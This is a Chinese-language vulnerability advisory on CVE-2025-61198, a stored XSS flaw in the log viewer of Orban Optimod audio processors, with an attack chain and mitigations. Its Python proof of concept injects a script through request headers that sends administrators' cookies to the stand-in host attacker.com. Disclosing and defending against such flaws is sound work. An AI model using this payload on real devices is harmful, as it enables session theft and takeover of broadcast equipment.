CVE-2025-61198：Orban Optimod系列音频处理器存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61198

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Orban Optimod系列（Optimod 5950/5950HD/5750/5750HD/Trio）

漏洞概述

CVE-2025-61198是Orban公司Optimod系列音频处理器产品中存在的存储型跨站脚本（Stored XSS）漏洞。该漏洞影响Optimod 5950、Optimod 5950HD、Optimod 5750、Optimod 5750HD以及Optimod Trio等多款专业音频处理设备，软件版本为1.0.0.33，系统版本为2.5.26。

Orban Optimod系列设备广泛应用于广播电台、音频制作等专业领域，通常配备Web管理界面供管理员进行远程配置和监控。该漏洞的根本原因在于设备的Web管理界面在处理日志数据时，未对用户可控的日志输入进行充分的过滤和转义处理，攻击者可以通过某种途径将恶意JavaScript代码注入到日志条目中。由于这些日志数据会被存储在设备中并在管理界面的UI中渲染显示，当合法管理员或用户访问日志查看页面时，嵌入在日志中的恶意脚本将在其浏览器中自动执行。

该漏洞的CVSS评分为5.4，属于中危级别。虽然无需认证即可利用（PR:N），但需要用户交互（UI:R）才能触发攻击。攻击者可利用此漏洞窃取管理员会话Cookie、获取设备管理凭据、进行未授权操作或进一步实施网络钓鱼攻击。由于广播设备在媒体行业中的关键地位，此漏洞可能对广播系统的安全性构成潜在威胁。

技术细节

该漏洞属于典型的存储型XSS（Stored Cross-Site Scripting），其技术原理如下：

1. **注入点**：Optimod设备的Web管理界面提供了日志记录功能，日志条目可能来源于多种渠道，包括但不限于HTTP请求头、用户认证信息、网络连接详情等。这些数据在写入日志存储时未进行适当的HTML实体编码或过滤。

2. **存储机制**：恶意攻击者构造包含JavaScript代码的有效载荷（payload），并通过某种方式将其注入到设备的日志系统中。常见的注入向量可能包括精心构造的HTTP请求、特定的认证尝试、或利用设备的其他输入字段。

3. **渲染触发**：当管理员通过Web界面查看日志时，服务器将日志内容直接返回给浏览器进行渲染。由于输出端未对日志内容进行HTML转义（如未将`<`、`>`、`"`、`'`等字符转换为对应的HTML实体），浏览器会将日志中的恶意脚本解析并执行。

4. **攻击影响**：恶意JavaScript在受害者的浏览器上下文中执行，攻击者可利用`document.cookie`窃取会话令牌、通过`fetch()`或`XMLHttpRequest`向攻击者控制的服务器发送敏感数据（如管理员凭据、设备配置信息），甚至利用管理界面的权限执行未授权的配置修改操作。

5. **利用条件**：根据CVSS向量，攻击通过网络进行（AV:N），攻击复杂度低（AC:L），无需权限提升（PR:N），但需要用户交互（UI:R）——即需要管理员查看包含恶意载荷的日志页面。

攻击链分析

STEP 1

步骤1：侦察与目标识别

攻击者通过网络扫描或信息收集，识别暴露在网络中的Orban Optimod设备管理界面（通常为Web服务，默认端口为80或443）。

STEP 2

步骤2：构造恶意载荷

攻击者精心构造包含JavaScript代码的恶意字符串，该代码通常用于窃取Cookie、会话令牌或执行其他恶意操作。

STEP 3

步骤3：注入日志

攻击者通过发送特定的HTTP请求（如使用恶意User-Agent、Referer头或认证尝试），将恶意载荷注入到设备的日志系统中，日志数据被存储在设备内部。

STEP 4

步骤4：等待管理员查看

当合法的系统管理员通过Web界面查看设备日志时，浏览器从服务器获取包含恶意脚本的日志内容。

STEP 5

步骤5：脚本执行

由于日志输出未进行HTML转义，浏览器将恶意JavaScript作为合法页面内容解析并执行，脚本在管理员的浏览器上下文中运行。

STEP 6

步骤6：数据窃取与权限提升

恶意脚本窃取管理员的会话Cookie、凭据或设备配置信息，攻击者可利用这些信息获取设备的管理权限，进行进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61198 - Orban Optimod Stored XSS PoC
# This PoC demonstrates the stored XSS vulnerability in Optimod log rendering

import requests

TARGET_URL = "http://<target_optimod_ip>"
LOG_INJECTION_ENDPOINT = "/api/logs"  # Example endpoint for log injection

# Malicious JavaScript payload to be injected into logs
# This payload will execute when an admin views the logs in the web UI
xss_payload = '<script>fetch("http://attacker.com/steal?cookie="+document.cookie+"&url="+document.location)</script>'

def inject_xss_via_log(target_url, payload):
    """
    Inject malicious JavaScript payload into the Optimod device logs.
    The payload will be stored and executed when an admin views the log entries.
    """
    # Craft a request that causes the payload to be written into the log
    # The exact injection vector depends on the log source (e.g., HTTP header,
    # authentication attempt, or user-agent string)
    headers = {
        "User-Agent": payload,  # Inject via User-Agent header which gets logged
        "X-Forwarded-For": payload,  # Alternative injection via forwarded header
    }

    # Send request to trigger log entry with malicious payload
    response = requests.get(
        f"{target_url}/login",
        headers=headers,
        timeout=10
    )

    print(f"[*] Payload injected via log. Status: {response.status_code}")
    print(f"[*] Payload: {payload}")
    print(f"[*] When admin views logs, the script will execute in their browser.")

if __name__ == "__main__":
    inject_xss_via_log(TARGET_URL, xss_payload)

影响范围

Optimod 5950 软件版本 < 1.0.0.33

Optimod 5950HD 软件版本 < 1.0.0.33

Optimod 5750 软件版本 < 1.0.0.33

Optimod 5750HD 软件版本 < 1.0.0.33

Optimod Trio 软件版本 < 1.0.0.33

Optimod 系统版本 2.5.26

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制Optimod设备管理界面的网络访问范围，仅允许必要的可信管理员IP地址通过防火墙或ACL规则访问；2）在反向代理或Web应用防火墙（WAF）层面部署XSS防护规则，对日志相关的API响应进行内容过滤；3）避免使用默认凭据，启用强密码策略并定期更换管理员密码；4）监控异常的出站网络连接，警惕可能的Cookie或凭据窃取行为；5）定期清除设备日志，减少恶意载荷驻留时间；6）在浏览器端使用安全插件（如NoScript）并启用内容安全策略。